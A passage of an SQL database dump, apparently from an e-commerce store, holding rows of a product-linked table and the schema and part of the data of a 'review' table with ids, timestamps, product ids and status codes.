(29466, NULL, NULL, 2060, 1, '2026-05-06 23:54:22'),
(29467, NULL, NULL, 2054, 1, '2026-05-07 00:50:39'),
(29468, NULL, NULL, 2059, 1, '2026-05-07 01:20:45'),
(29469, NULL, NULL, 2053, 1, '2026-05-07 03:05:14'),
(29470, NULL, NULL, 2061, 1, '2026-05-07 03:47:09'),
(29471, NULL, NULL, 2063, 1, '2026-05-07 04:41:20'),
(29472, NULL, NULL, 2064, 1, '2026-05-07 04:42:47'),
(29473, NULL, NULL, 2060, 1, '2026-05-07 05:03:48'),
(29474, NULL, NULL, 2064, 1, '2026-05-07 05:07:33'),
(29475, NULL, NULL, 2064, 1, '2026-05-07 06:35:29'),
(29476, NULL, NULL, 2059, 1, '2026-05-07 07:34:05'),
(29477, NULL, NULL, 2063, 1, '2026-05-07 08:36:24'),
(29478, NULL, NULL, 2063, 1, '2026-05-07 08:36:52'),
(29479, NULL, NULL, 2061, 1, '2026-05-07 09:46:57'),
(29480, NULL, NULL, 2060, 1, '2026-05-07 10:23:28'),
(29481, NULL, NULL, 2060, 1, '2026-05-07 10:50:17'),
(29482, NULL, NULL, 2061, 1, '2026-05-07 12:17:27'),
(29483, NULL, NULL, 2054, 1, '2026-05-07 15:05:19'),
(29484, NULL, NULL, 2061, 1, '2026-05-07 20:10:11'),
(29485, NULL, NULL, 2058, 1, '2026-05-07 21:32:47'),
(29486, NULL, NULL, 2060, 1, '2026-05-07 21:43:03'),
(29487, NULL, NULL, 2060, 1, '2026-05-07 21:43:06'),
(29488, NULL, NULL, 2063, 1, '2026-05-07 21:51:19'),
(29489, NULL, NULL, 2059, 1, '2026-05-07 21:56:09'),
(29490, NULL, NULL, 2061, 1, '2026-05-07 21:56:10'),
(29491, NULL, NULL, 2058, 1, '2026-05-07 21:56:11'),
(29492, NULL, NULL, 2055, 1, '2026-05-07 21:56:15'),
(29493, NULL, NULL, 2064, 1, '2026-05-07 21:56:15'),
(29494, NULL, NULL, 2059, 1, '2026-05-07 21:56:16'),
(29495, NULL, NULL, 2061, 1, '2026-05-07 21:56:18'),
(29496, NULL, NULL, 2058, 1, '2026-05-07 21:56:19'),
(29497, NULL, NULL, 2058, 1, '2026-05-07 21:56:21'),
(29498, NULL, NULL, 2059, 1, '2026-05-07 21:56:22'),
(29499, NULL, NULL, 2061, 1, '2026-05-07 21:56:23'),
(29500, NULL, NULL, 2064, 1, '2026-05-07 21:56:23'),
(29501, NULL, NULL, 2060, 1, '2026-05-07 21:56:23'),
(29502, NULL, NULL, 2062, 1, '2026-05-07 21:56:24'),
(29503, NULL, NULL, 2063, 1, '2026-05-07 21:56:24'),
(29504, NULL, NULL, 2064, 1, '2026-05-07 21:56:24'),
(29505, NULL, NULL, 2055, 1, '2026-05-07 21:56:25'),
(29506, NULL, NULL, 2064, 1, '2026-05-07 21:56:26'),
(29507, NULL, NULL, 2058, 1, '2026-05-07 21:56:30'),
(29508, NULL, NULL, 2059, 1, '2026-05-07 21:56:32'),
(29509, NULL, NULL, 2061, 1, '2026-05-07 21:56:32'),
(29510, NULL, NULL, 2064, 1, '2026-05-07 21:56:33'),
(29511, NULL, NULL, 2064, 1, '2026-05-07 21:56:33'),
(29512, NULL, NULL, 2060, 1, '2026-05-07 21:56:34'),
(29513, NULL, NULL, 2063, 1, '2026-05-07 21:56:34'),
(29514, NULL, NULL, 2062, 1, '2026-05-07 21:56:35'),
(29515, NULL, NULL, 2055, 1, '2026-05-07 21:56:35'),
(29516, NULL, NULL, 2064, 1, '2026-05-07 21:56:36'),
(29517, NULL, NULL, 2058, 1, '2026-05-07 21:56:39'),
(29518, NULL, NULL, 2059, 1, '2026-05-07 21:56:40'),
(29519, NULL, NULL, 2061, 1, '2026-05-07 21:56:40'),
(29520, NULL, NULL, 2064, 1, '2026-05-07 21:56:42'),
(29521, NULL, NULL, 2054, 1, '2026-05-07 21:56:42'),
(29522, NULL, NULL, 2064, 1, '2026-05-07 21:56:42'),
(29523, NULL, NULL, 2060, 1, '2026-05-07 21:56:43'),
(29524, NULL, NULL, 2063, 1, '2026-05-07 21:56:44'),
(29525, NULL, NULL, 2062, 1, '2026-05-07 21:56:45'),
(29526, NULL, NULL, 2055, 1, '2026-05-07 21:56:46'),
(29527, NULL, NULL, 2064, 1, '2026-05-07 21:56:46'),
(29528, NULL, NULL, 2064, 1, '2026-05-07 21:56:46'),
(29529, NULL, NULL, 2064, 1, '2026-05-07 21:56:47'),
(29530, NULL, NULL, 2062, 1, '2026-05-07 21:56:47'),
(29531, NULL, NULL, 2060, 1, '2026-05-07 21:56:47'),
(29532, NULL, NULL, 2063, 1, '2026-05-07 21:56:49'),
(29533, NULL, NULL, 2054, 1, '2026-05-07 21:56:55'),
(29534, NULL, NULL, 2064, 1, '2026-05-07 21:56:56'),
(29535, NULL, NULL, 2062, 1, '2026-05-07 21:56:57'),
(29536, NULL, NULL, 2054, 1, '2026-05-07 21:56:59'),
(29537, NULL, NULL, 2054, 1, '2026-05-07 21:57:04'),
(29538, NULL, NULL, 2061, 1, '2026-05-07 21:58:48'),
(29539, NULL, NULL, 2060, 1, '2026-05-07 22:59:09'),
(29540, NULL, NULL, 2060, 1, '2026-05-07 22:59:12'),
(29541, NULL, NULL, 2061, 1, '2026-05-08 00:42:58'),
(29542, NULL, NULL, 2058, 1, '2026-05-08 02:02:20'),
(29543, NULL, NULL, 2060, 1, '2026-05-08 07:48:18'),
(29544, NULL, NULL, 2063, 1, '2026-05-08 08:43:01'),
(29545, NULL, NULL, 2061, 1, '2026-05-08 09:22:13'),
(29546, NULL, NULL, 2054, 1, '2026-05-08 11:42:50'),
(29547, NULL, NULL, 2055, 1, '2026-05-08 12:12:42'),
(29548, NULL, NULL, 2060, 1, '2026-05-08 12:25:22'),
(29549, NULL, NULL, 2064, 1, '2026-05-08 12:25:24'),
(29550, NULL, NULL, 2063, 1, '2026-05-08 12:25:26'),
(29551, NULL, NULL, 2058, 1, '2026-05-08 12:25:28'),
(29552, NULL, NULL, 2061, 1, '2026-05-08 12:25:30'),
(29553, NULL, NULL, 2059, 1, '2026-05-08 12:25:31'),
(29554, NULL, NULL, 2062, 1, '2026-05-08 12:25:34'),
(29555, NULL, NULL, 2054, 1, '2026-05-08 12:25:36'),
(29556, NULL, NULL, 2055, 1, '2026-05-08 12:25:39'),
(29557, NULL, NULL, 2053, 1, '2026-05-08 12:25:55'),
(29558, NULL, NULL, 2064, 1, '2026-05-08 12:46:41'),
(29559, NULL, NULL, 2054, 1, '2026-05-08 13:19:21'),
(29560, NULL, NULL, 2055, 1, '2026-05-08 14:03:37'),
(29561, NULL, NULL, 2064, 1, '2026-05-08 14:27:28'),
(29562, NULL, NULL, 2060, 1, '2026-05-08 14:30:55'),
(29563, NULL, NULL, 2054, 1, '2026-05-08 15:03:42'),
(29564, NULL, NULL, 2062, 1, '2026-05-08 15:32:37'),
(29565, NULL, NULL, 2062, 1, '2026-05-08 15:50:20'),
(29566, NULL, NULL, 2062, 1, '2026-05-08 15:54:38'),
(29567, NULL, NULL, 2062, 1, '2026-05-08 16:23:33'),
(29568, NULL, NULL, 2062, 1, '2026-05-08 16:24:04'),
(29569, NULL, NULL, 2060, 1, '2026-05-08 17:23:24'),
(29570, NULL, NULL, 2055, 1, '2026-05-08 18:36:10'),
(29571, NULL, NULL, 2054, 1, '2026-05-08 22:08:47'),
(29572, NULL, NULL, 2064, 1, '2026-05-08 22:15:56'),
(29573, NULL, NULL, 2064, 1, '2026-05-08 22:42:56'),
(29574, NULL, NULL, 2062, 1, '2026-05-08 23:29:05'),
(29575, NULL, NULL, 2061, 1, '2026-05-08 23:34:40'),
(29576, NULL, NULL, 2061, 1, '2026-05-09 01:31:21'),
(29577, NULL, NULL, 2053, 1, '2026-05-09 01:37:35'),
(29578, NULL, NULL, 2060, 1, '2026-05-09 02:01:56'),
(29579, NULL, NULL, 2060, 1, '2026-05-09 02:09:29'),
(29580, NULL, NULL, 2053, 1, '2026-05-09 02:10:54'),
(29581, NULL, NULL, 2053, 1, '2026-05-09 02:27:19'),
(29582, NULL, NULL, 2059, 1, '2026-05-09 02:48:21'),
(29583, NULL, NULL, 2063, 1, '2026-05-09 02:49:49'),
(29584, NULL, NULL, 2053, 1, '2026-05-09 02:50:52'),
(29585, NULL, NULL, 2061, 1, '2026-05-09 02:56:29'),
(29586, NULL, NULL, 2059, 1, '2026-05-09 03:01:53'),
(29587, NULL, NULL, 2060, 1, '2026-05-09 03:03:54'),
(29588, NULL, NULL, 2058, 1, '2026-05-09 03:08:43'),
(29589, NULL, NULL, 2055, 1, '2026-05-09 03:14:48'),
(29590, NULL, NULL, 2054, 1, '2026-05-09 03:21:31'),
(29591, NULL, NULL, 2060, 1, '2026-05-09 03:28:23'),
(29592, NULL, NULL, 2063, 1, '2026-05-09 03:41:23'),
(29593, NULL, NULL, 2059, 1, '2026-05-09 04:00:34'),
(29594, NULL, NULL, 2053, 1, '2026-05-09 05:31:46'),
(29595, NULL, NULL, 2059, 1, '2026-05-09 07:17:56'),
(29596, NULL, NULL, 2060, 1, '2026-05-09 07:20:33'),
(29597, NULL, NULL, 2059, 1, '2026-05-09 07:57:27'),
(29598, NULL, NULL, 2053, 1, '2026-05-09 09:04:06'),
(29599, NULL, NULL, 2058, 1, '2026-05-09 09:04:14'),
(29600, NULL, NULL, 2063, 1, '2026-05-09 10:23:39'),
(29601, NULL, NULL, 2062, 1, '2026-05-09 10:23:44'),
(29602, NULL, NULL, 2061, 1, '2026-05-09 10:24:46'),
(29603, NULL, NULL, 2060, 1, '2026-05-09 10:50:47'),
(29604, NULL, NULL, 2054, 1, '2026-05-09 13:37:13'),
(29605, NULL, NULL, 2063, 1, '2026-05-09 13:40:57'),
(29606, NULL, NULL, 2062, 1, '2026-05-09 14:47:22'),
(29607, NULL, NULL, 2062, 1, '2026-05-09 15:59:52'),
(29608, NULL, NULL, 2062, 1, '2026-05-09 16:00:45'),
(29609, NULL, NULL, 2055, 1, '2026-05-09 18:57:11'),
(29610, NULL, NULL, 2053, 1, '2026-05-09 19:36:27'),
(29611, NULL, NULL, 2061, 1, '2026-05-09 22:36:43'),
(29612, NULL, NULL, 2062, 1, '2026-05-09 22:58:18'),
(29613, NULL, NULL, 2061, 1, '2026-05-09 22:58:23'),
(29614, NULL, NULL, 2063, 1, '2026-05-09 22:58:26'),
(29615, NULL, NULL, 2060, 1, '2026-05-09 23:02:38'),
(29616, NULL, NULL, 2064, 1, '2026-05-09 23:02:41'),
(29617, NULL, NULL, 2058, 1, '2026-05-09 23:38:26'),
(29618, NULL, NULL, 2061, 1, '2026-05-10 00:29:36'),
(29619, NULL, NULL, 2059, 1, '2026-05-10 01:11:01'),
(29620, NULL, NULL, 2055, 1, '2026-05-10 02:13:19'),
(29621, NULL, NULL, 2062, 1, '2026-05-10 03:02:34'),
(29622, NULL, NULL, 2060, 1, '2026-05-10 03:05:08'),
(29623, NULL, NULL, 2058, 1, '2026-05-10 03:28:38'),
(29624, NULL, NULL, 2060, 1, '2026-05-10 04:25:47'),
(29625, NULL, NULL, 2060, 1, '2026-05-10 04:25:50'),
(29626, NULL, NULL, 2060, 1, '2026-05-10 06:19:38'),
(29627, NULL, NULL, 2060, 1, '2026-05-10 06:19:42'),
(29628, NULL, NULL, 2060, 1, '2026-05-10 08:59:44'),
(29629, NULL, NULL, 2064, 1, '2026-05-10 09:45:54'),
(29630, NULL, NULL, 2060, 1, '2026-05-10 11:00:38'),
(29631, NULL, NULL, 2062, 1, '2026-05-10 11:03:11'),
(29632, NULL, NULL, 2060, 1, '2026-05-10 11:56:56'),
(29633, NULL, NULL, 2053, 1, '2026-05-10 13:32:14'),
(29634, NULL, NULL, 2062, 1, '2026-05-10 16:16:07'),
(29635, NULL, NULL, 2062, 1, '2026-05-10 16:16:29'),
(29636, NULL, NULL, 2062, 1, '2026-05-10 18:44:37'),
(29637, NULL, NULL, 2064, 1, '2026-05-10 18:45:41'),
(29638, NULL, NULL, 2064, 1, '2026-05-10 21:21:39'),
(29639, NULL, NULL, 2054, 1, '2026-05-10 21:47:26'),
(29640, NULL, NULL, 2063, 1, '2026-05-10 21:47:41'),
(29641, NULL, NULL, 2060, 1, '2026-05-10 22:19:16'),
(29642, NULL, NULL, 2061, 1, '2026-05-10 22:44:03'),
(29643, NULL, NULL, 2064, 1, '2026-05-11 04:14:27'),
(29644, NULL, NULL, 2059, 1, '2026-05-11 05:29:54'),
(29645, NULL, NULL, 2059, 1, '2026-05-11 05:30:28'),
(29646, NULL, NULL, 2059, 1, '2026-05-11 05:30:35'),
(29647, NULL, NULL, 2060, 1, '2026-05-11 06:25:58'),
(29648, NULL, NULL, 2061, 1, '2026-05-11 07:18:54'),
(29649, NULL, NULL, 2064, 1, '2026-05-11 07:19:08'),
(29650, NULL, NULL, 2059, 1, '2026-05-11 09:40:52'),
(29651, NULL, NULL, 2059, 1, '2026-05-11 09:48:31'),
(29652, NULL, NULL, 2061, 1, '2026-05-11 10:03:10'),
(29653, NULL, NULL, 2055, 1, '2026-05-11 10:54:39'),
(29654, NULL, NULL, 2062, 1, '2026-05-11 11:26:38'),
(29655, NULL, NULL, 2062, 1, '2026-05-11 11:55:50'),
(29656, NULL, NULL, 2058, 1, '2026-05-11 12:02:20'),
(29657, NULL, NULL, 2064, 1, '2026-05-11 13:10:51'),
(29658, NULL, NULL, 2058, 1, '2026-05-11 15:12:33'),
(29659, NULL, NULL, 2062, 1, '2026-05-11 15:22:50'),
(29660, NULL, NULL, 2062, 1, '2026-05-11 15:23:21'),
(29661, NULL, NULL, 2058, 1, '2026-05-11 15:34:58'),
(29662, NULL, NULL, 2061, 1, '2026-05-11 17:29:13'),
(29663, NULL, NULL, 2060, 1, '2026-05-11 18:24:45'),
(29664, NULL, NULL, 2064, 1, '2026-05-11 19:01:09'),
(29665, NULL, NULL, 2061, 1, '2026-05-11 19:01:12'),
(29666, NULL, NULL, 2063, 1, '2026-05-11 19:01:13'),
(29667, NULL, NULL, 2062, 1, '2026-05-11 19:01:14'),
(29668, NULL, NULL, 2055, 1, '2026-05-11 19:01:15'),
(29669, NULL, NULL, 2058, 1, '2026-05-11 19:01:16'),
(29670, NULL, NULL, 2064, 1, '2026-05-11 19:01:18'),
(29671, NULL, NULL, 2059, 1, '2026-05-11 19:01:19'),
(29672, NULL, NULL, 2063, 1, '2026-05-11 19:01:20'),
(29673, NULL, NULL, 2063, 1, '2026-05-11 19:01:22'),
(29674, NULL, NULL, 2058, 1, '2026-05-11 19:01:23'),
(29675, NULL, NULL, 2059, 1, '2026-05-11 19:01:23'),
(29676, NULL, NULL, 2061, 1, '2026-05-11 19:01:24'),
(29677, NULL, NULL, 2064, 1, '2026-05-11 19:01:26'),
(29678, NULL, NULL, 2058, 1, '2026-05-11 19:01:27'),
(29679, NULL, NULL, 2062, 1, '2026-05-11 19:01:29'),
(29680, NULL, NULL, 2055, 1, '2026-05-11 19:01:29'),
(29681, NULL, NULL, 2060, 1, '2026-05-11 19:01:30'),
(29682, NULL, NULL, 2060, 1, '2026-05-11 19:01:33'),
(29683, NULL, NULL, 2064, 1, '2026-05-11 19:01:35'),
(29684, NULL, NULL, 2059, 1, '2026-05-11 19:01:36'),
(29685, NULL, NULL, 2058, 1, '2026-05-11 19:01:37'),
(29686, NULL, NULL, 2054, 1, '2026-05-11 19:01:37'),
(29687, NULL, NULL, 2059, 1, '2026-05-11 19:01:39'),
(29688, NULL, NULL, 2064, 1, '2026-05-11 19:01:40'),
(29689, NULL, NULL, 2054, 1, '2026-05-11 19:01:41'),
(29690, NULL, NULL, 2061, 1, '2026-05-11 19:01:42'),
(29691, NULL, NULL, 2064, 1, '2026-05-11 19:01:43'),
(29692, NULL, NULL, 2061, 1, '2026-05-11 19:01:44'),
(29693, NULL, NULL, 2062, 1, '2026-05-11 19:01:45'),
(29694, NULL, NULL, 2061, 1, '2026-05-11 19:01:46'),
(29695, NULL, NULL, 2063, 1, '2026-05-11 19:01:47'),
(29696, NULL, NULL, 2062, 1, '2026-05-11 19:01:48'),
(29697, NULL, NULL, 2064, 1, '2026-05-11 19:01:49'),
(29698, NULL, NULL, 2061, 1, '2026-05-11 19:01:50'),
(29699, NULL, NULL, 2062, 1, '2026-05-11 19:27:53'),
(29700, NULL, NULL, 2062, 1, '2026-05-11 19:27:56'),
(29701, NULL, NULL, 2054, 1, '2026-05-11 20:08:27'),
(29702, NULL, NULL, 2063, 1, '2026-05-11 20:47:02'),
(29703, NULL, NULL, 2053, 1, '2026-05-11 23:55:25'),
(29704, NULL, NULL, 2060, 1, '2026-05-12 00:33:24'),
(29705, NULL, NULL, 2064, 1, '2026-05-12 01:50:12'),
(29706, NULL, NULL, 2063, 1, '2026-05-12 05:05:14'),
(29707, NULL, NULL, 2061, 1, '2026-05-12 07:53:58'),
(29708, NULL, NULL, 2064, 1, '2026-05-12 08:05:06'),
(29709, NULL, NULL, 2061, 1, '2026-05-12 08:41:58'),
(29710, NULL, NULL, 2053, 1, '2026-05-12 09:07:12'),
(29711, NULL, NULL, 2062, 1, '2026-05-12 09:32:34'),
(29712, NULL, NULL, 2059, 1, '2026-05-12 09:39:45'),
(29713, NULL, NULL, 2058, 1, '2026-05-12 09:40:02');

-- --------------------------------------------------------

--
-- Table structure for table `review`
--

CREATE TABLE `review` (
  `review_id` bigint(20) UNSIGNED NOT NULL COMMENT 'Review ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Review create date',
  `entity_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `entity_pk_value` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `status_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Status code'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Review base information';

--
-- Dumping data for table `review`
--

INSERT INTO `review` (`review_id`, `created_at`, `entity_id`, `entity_pk_value`, `status_id`) VALUES
(313, '2020-08-08 01:44:25', 1, 2053, 1),
(314, '2020-08-08 01:44:25', 1, 2053, 1),
(315, '2020-08-08 01:44:25', 1, 2053, 1),
(316, '2021-05-02 11:48:34', 1, 2063, 2),
(317, '2021-05-18 03:30:46', 1, 2064, 2),
(318, '2021-05-27 05:54:52', 1, 2063, 2),
(319, '2021-05-27 05:55:44', 1, 2063, 2),
(320, '2021-06-07 04:15:14', 1, 2064, 2),
(321, '2021-06-07 04:15:36', 1, 2064, 2),
(322, '2021-06-08 12:09:09', 1, 2064, 1),
(323, '2023-03-09 15:21:14', 1, 2055, 2),
(324, '2023-03-11 03:43:22', 1, 2062, 2),
(325, '2023-03-12 06:42:29', 1, 2061, 2),
(326, '2023-03-12 12:46:33', 1, 2059, 2),
(327, '2023-03-13 17:23:53', 1, 2054, 2),
(328, '2023-03-14 23:54:57', 1, 2060, 2),
(329, '2023-03-17 02:39:23', 1, 2058, 2),
(330, '2023-03-18 20:07:32', 1, 2063, 2),
(331, '2023-08-12 09:02:08', 1, 2054, 2),
(332, '2023-08-12 09:02:14', 1, 2054, 2),
(333, '2023-08-12 09:02:17', 1, 2054, 2),
(334, '2023-08-12 09:02:21', 1, 2054, 2),
(335, '2023-08-12 09:02:23', 1, 2054, 2),
(336, '2023-08-12 09:02:26', 1, 2054, 2),
(337, '2023-08-12 09:02:28', 1, 2054, 2),
(338, '2023-08-12 09:02:29', 1, 2054, 2),
(339, '2023-08-12 09:02:30', 1, 2054, 2),
(340, '2023-08-12 09:02:31', 1, 2054, 2),
(341, '2023-08-12 09:02:33', 1, 2054, 2),
(342, '2023-08-12 09:02:34', 1, 2054, 2),
(343, '2023-08-12 09:02:35', 1, 2054, 2),
(344, '2023-08-12 09:02:36', 1, 2054, 2),
(345, '2023-08-12 09:02:38', 1, 2054, 2),
(346, '2023-08-12 09:02:39', 1, 2054, 2),
(347, '2023-08-12 09:02:40', 1, 2054, 2),
(348, '2023-08-12 09:02:41', 1, 2054, 2),
(349, '2023-08-12 09:02:45', 1, 2054, 2),
(350, '2023-08-12 09:02:46', 1, 2054, 2),
(351, '2023-08-12 09:02:51', 1, 2054, 2),
(352, '2023-08-12 09:02:52', 1, 2054, 2),
(353, '2023-08-12 09:02:56', 1, 2054, 2),
(354, '2023-08-12 09:02:58', 1, 2054, 2),
(355, '2023-08-12 09:03:01', 1, 2054, 2),
(356, '2023-08-12 09:03:03', 1, 2054, 2),
(357, '2023-08-12 09:03:06', 1, 2054, 2),
(358, '2023-08-12 09:03:07', 1, 2054, 2),
(359, '2023-08-12 09:03:10', 1, 2054, 2),
(360, '2023-08-12 09:03:11', 1, 2054, 2),
(361, '2023-08-12 09:03:15', 1, 2054, 2),
(362, '2023-08-12 09:03:18', 1, 2054, 2),
(363, '2023-08-12 09:03:21', 1, 2054, 2),
(364, '2023-08-12 09:03:23', 1, 2054, 2),
(365, '2023-08-12 09:03:25', 1, 2054, 2),
(366, '2023-08-12 09:03:28', 1, 2054, 2),
(367, '2023-08-12 09:03:29', 1, 2054, 2),
(368, '2023-08-12 09:03:32', 1, 2054, 2),
(369, '2023-08-12 09:03:33', 1, 2054, 2),
(370, '2023-08-12 09:03:35', 1, 2054, 2),
(371, '2023-08-12 09:03:37', 1, 2054, 2),
(372, '2023-08-12 09:03:39', 1, 2054, 2),
(373, '2023-08-12 09:03:43', 1, 2054, 2),
(374, '2023-08-12 09:03:45', 1, 2054, 2),
(375, '2023-08-12 09:03:50', 1, 2054, 2),
(376, '2023-08-12 09:03:52', 1, 2054, 2),
(377, '2023-08-12 09:03:57', 1, 2054, 2),
(378, '2023-08-12 09:03:59', 1, 2054, 2),
(379, '2023-08-12 09:03:59', 1, 2054, 2),
(380, '2023-08-12 09:04:02', 1, 2054, 2),
(381, '2023-08-12 09:04:02', 1, 2054, 2),
(382, '2023-08-12 09:04:04', 1, 2054, 2),
(383, '2023-08-12 09:04:04', 1, 2054, 2),
(384, '2023-08-12 09:04:06', 1, 2054, 2),
(385, '2023-08-12 09:04:08', 1, 2054, 2),
(386, '2023-08-12 09:04:14', 1, 2054, 2),
(387, '2023-08-12 09:04:15', 1, 2054, 2),
(388, '2023-08-12 09:04:21', 1, 2054, 2),
(389, '2023-08-12 09:04:45', 1, 2054, 2),
(390, '2023-08-12 09:04:46', 1, 2054, 2),
(391, '2023-08-12 09:04:47', 1, 2054, 2),
(392, '2023-08-12 09:04:49', 1, 2054, 2),
(393, '2023-08-12 09:04:50', 1, 2054, 2),
(394, '2023-08-12 09:04:53', 1, 2054, 2),
(395, '2023-08-12 09:04:57', 1, 2054, 2),
(396, '2023-08-12 09:04:58', 1, 2054, 2),
(397, '2023-08-12 09:05:00', 1, 2054, 2),
(398, '2023-08-12 09:05:02', 1, 2054, 2),
(399, '2023-08-12 09:05:03', 1, 2054, 2),
(400, '2023-08-12 09:05:07', 1, 2054, 2),
(401, '2023-08-12 09:05:10', 1, 2054, 2),
(402, '2023-08-12 09:05:11', 1, 2054, 2),
(403, '2023-08-12 09:05:14', 1, 2054, 2),
(404, '2023-08-12 09:05:18', 1, 2054, 2),
(405, '2023-08-12 09:05:21', 1, 2054, 2),
(406, '2023-08-12 09:05:23', 1, 2054, 2),
(407, '2023-08-12 09:05:26', 1, 2054, 2),
(408, '2023-08-12 09:05:27', 1, 2054, 2),
(409, '2023-08-12 09:05:28', 1, 2054, 2),
(410, '2023-08-12 09:05:30', 1, 2054, 2),
(411, '2023-08-12 09:05:34', 1, 2054, 2),
(412, '2023-08-12 09:05:36', 1, 2054, 2),
(413, '2023-08-12 09:05:37', 1, 2054, 2),
(414, '2023-08-12 09:05:39', 1, 2054, 2),
(415, '2023-08-12 09:05:40', 1, 2054, 2),
(416, '2023-08-12 09:05:42', 1, 2054, 2),
(417, '2023-08-12 09:05:43', 1, 2054, 2),
(418, '2023-08-12 09:05:43', 1, 2054, 2),
(419, '2023-08-12 09:05:45', 1, 2054, 2),
(420, '2023-08-12 09:05:46', 1, 2054, 2),
(421, '2023-08-12 09:05:47', 1, 2054, 2),
(422, '2023-08-12 09:05:48', 1, 2054, 2),
(423, '2023-08-12 09:05:54', 1, 2054, 2),
(424, '2023-08-12 09:05:55', 1, 2054, 2),
(425, '2023-08-12 09:06:00', 1, 2054, 2),
(426, '2023-08-12 09:06:01', 1, 2054, 2),
(427, '2023-08-12 09:06:06', 1, 2054, 2),
(428, '2023-08-12 09:06:07', 1, 2054, 2),
(429, '2023-08-12 09:06:12', 1, 2054, 2),
(430, '2023-08-12 09:06:13', 1, 2054, 2),
(431, '2023-08-12 09:06:17', 1, 2054, 2),
(432, '2023-08-12 09:06:19', 1, 2054, 2),
(433, '2023-08-12 09:06:23', 1, 2054, 2),
(434, '2023-08-12 09:06:25', 1, 2054, 2),
(435, '2023-08-12 09:06:27', 1, 2054, 2),
(436, '2023-08-12 09:06:32', 1, 2054, 2),
(437, '2023-08-12 09:06:33', 1, 2054, 2),
(438, '2023-08-12 09:06:37', 1, 2054, 2),
(439, '2023-08-12 09:06:38', 1, 2054, 2),
(440, '2023-08-12 09:06:40', 1, 2054, 2),
(441, '2023-08-12 09:06:42', 1, 2054, 2),
(442, '2023-08-12 09:06:43', 1, 2054, 2),
(443, '2023-08-12 09:06:44', 1, 2054, 2),
(444, '2023-08-12 09:06:46', 1, 2054, 2),
(445, '2023-08-12 09:06:47', 1, 2054, 2),
(446, '2023-08-12 09:06:50', 1, 2054, 2),
(447, '2023-08-12 09:06:51', 1, 2054, 2),
(448, '2023-08-12 09:06:52', 1, 2054, 2),
(449, '2023-08-12 09:06:55', 1, 2054, 2),
(450, '2023-08-12 09:06:58', 1, 2054, 2),
(451, '2023-08-12 09:07:04', 1, 2054, 2),
(452, '2023-08-12 09:07:04', 1, 2054, 2),
(453, '2023-08-12 09:07:05', 1, 2054, 2),
(454, '2023-08-12 09:07:08', 1, 2054, 2),
(455, '2023-08-12 09:07:10', 1, 2054, 2),
(456, '2023-08-12 09:07:10', 1, 2054, 2),
(457, '2023-08-12 09:07:13', 1, 2054, 2),
(458, '2023-08-12 09:07:15', 1, 2054, 2),
(459, '2023-08-12 09:07:17', 1, 2054, 2),
(460, '2023-08-12 09:07:18', 1, 2054, 2),
(461, '2023-08-12 09:07:18', 1, 2054, 2),
(462, '2023-08-12 09:07:20', 1, 2054, 2),
(463, '2023-08-12 09:07:20', 1, 2054, 2),
(464, '2023-08-12 09:07:23', 1, 2054, 2),
(465, '2023-08-12 09:07:23', 1, 2054, 2),
(466, '2023-08-12 09:07:25', 1, 2054, 2),
(467, '2023-08-12 09:07:27', 1, 2054, 2),
(468, '2023-08-12 09:07:28', 1, 2054, 2),
(469, '2023-08-12 09:07:33', 1, 2054, 2),
(470, '2023-08-12 09:07:35', 1, 2054, 2),
(471, '2023-08-12 09:07:39', 1, 2054, 2),
(472, '2023-08-12 09:07:41', 1, 2054, 2),
(473, '2023-08-12 09:07:45', 1, 2054, 2),
(474, '2023-08-12 09:07:46', 1, 2054, 2),
(475, '2023-08-12 09:07:47', 1, 2054, 2),
(476, '2023-08-12 09:07:50', 1, 2054, 2),
(477, '2023-08-12 09:07:51', 1, 2054, 2),
(478, '2023-08-12 09:07:53', 1, 2054, 2),
(479, '2023-08-12 09:07:54', 1, 2054, 2),
(480, '2023-08-12 09:07:55', 1, 2054, 2),
(481, '2023-08-12 09:07:56', 1, 2054, 2),
(482, '2023-08-12 09:07:56', 1, 2054, 2),
(483, '2023-08-12 09:08:00', 1, 2054, 2),
(484, '2023-08-12 09:08:06', 1, 2054, 2),
(485, '2023-08-12 09:08:13', 1, 2054, 2),
(486, '2023-08-12 09:08:18', 1, 2054, 2),
(487, '2023-08-12 09:08:21', 1, 2054, 2),
(488, '2023-08-12 09:08:24', 1, 2054, 2),
(489, '2023-08-12 09:08:29', 1, 2054, 2),
(490, '2023-08-12 09:08:32', 1, 2054, 2),
(491, '2023-08-12 09:08:35', 1, 2054, 2),
(492, '2023-08-12 09:08:42', 1, 2054, 2),
(493, '2023-08-12 09:08:44', 1, 2054, 2),
(494, '2023-08-12 09:08:50', 1, 2054, 2),
(495, '2023-08-12 09:08:55', 1, 2054, 2),
(496, '2023-08-12 09:09:00', 1, 2054, 2),
(497, '2023-08-12 09:09:05', 1, 2054, 2),
(498, '2023-08-12 09:09:09', 1, 2054, 2),
(499, '2023-08-12 09:09:12', 1, 2054, 2),
(500, '2023-08-12 09:09:18', 1, 2054, 2),
(501, '2023-08-12 09:09:23', 1, 2054, 2),
(502, '2023-08-12 09:09:28', 1, 2054, 2),
(503, '2023-08-12 09:09:32', 1, 2054, 2),
(504, '2023-08-12 09:09:38', 1, 2054, 2),
(505, '2023-08-12 09:09:42', 1, 2054, 2),
(506, '2023-08-12 09:09:49', 1, 2054, 2),
(507, '2023-08-12 09:09:54', 1, 2054, 2),
(508, '2023-08-12 09:10:01', 1, 2054, 2),
(509, '2023-08-12 09:10:04', 1, 2054, 2),
(510, '2023-08-12 09:10:08', 1, 2054, 2),
(511, '2023-08-12 09:10:12', 1, 2054, 2),
(512, '2023-08-12 09:10:14', 1, 2054, 2),
(513, '2023-08-12 09:10:17', 1, 2054, 2),
(514, '2023-08-12 09:10:19', 1, 2054, 2),
(515, '2023-08-12 09:10:21', 1, 2054, 2),
(516, '2023-08-12 09:10:23', 1, 2054, 2),
(517, '2023-08-12 09:10:26', 1, 2054, 2),
(518, '2023-08-12 09:10:29', 1, 2054, 2),
(519, '2023-08-12 09:10:33', 1, 2054, 2),
(520, '2023-08-12 09:10:35', 1, 2054, 2),
(521, '2023-08-12 09:10:38', 1, 2054, 2),
(522, '2023-08-12 09:10:43', 1, 2054, 2),
(523, '2023-08-12 09:10:50', 1, 2054, 2),
(524, '2023-08-12 09:10:55', 1, 2054, 2),
